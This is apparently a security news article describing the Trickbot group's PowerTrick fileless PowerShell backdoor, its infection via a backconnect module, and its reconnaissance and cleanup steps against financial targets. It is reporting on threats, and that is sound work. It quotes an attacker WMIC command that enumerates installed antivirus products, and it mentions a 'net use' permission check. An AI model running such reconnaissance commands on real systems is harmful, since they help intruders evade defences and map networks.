Researchers discovered new activities from Russian based cybercrime group who behind the “Trickbot” Trojan actively developed a new hacking tool, a fileless backdoor named “PowerTrick” that has been added to its arsenal and infecting the high profile targets.
PowerTrick is capable of maintaining stealthiness, persistence, and reconnaissance to the targets such as financial institutions and most of the hacking tools in this group’s arsenal used for the post-exploitation purpose and living in short time of period on the target network.
Researchers believe that the TrickBot is a successor of Dyre banking trojan that utilizes injection systems and later Trickbot shifted focus to enterprise environments and employed a new tactic and techniques.
Trickbot attempt to perform various attempt such as network profiling, mass data collection, incorporation of lateral traversal exploits.
The new Fileless Stealthy “PowerTrick” Backdoor has developed with various new features to be flexible and effective to avoid using other tools such as PowerShell Empire during the attack phase.
The main goal of the PowerTrick backdoor is to bypass restrictions and maintain the high-level security to exploit the highly protected networks.
PowerTrick Discovery and Infection Process
The initial level of attack by PowerTrick backdoor with PowerShell task that utilized through normal TrickBot infections with the help of backconnect module called “NewBCtest”.
Once the first stage of the attack started by the backdoor, attackers issued a command that intended to deliver a large number of backdoor.
According to Sentinel Lab research “PowerTrick is designed to execute commands and return the results in Base64 format, the system uses a generated UUID based on computer information as a “botID.”
Attackers also utilizing the other PowerShell utilities to do various tasks, in this case, they are frequently utilizing the Powershell stager for open-source exploitation framework Metasploit.
The attacker also utilizing various following commands to perform their malicious task.
net use with usernames to check permissions on systems
WMIC /node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
Once they gather relevant data from the compromised network, they start working for deletion operation and cleanup, behalf of this process, attackers also move on to a different target to high-value systems such as financial gateways.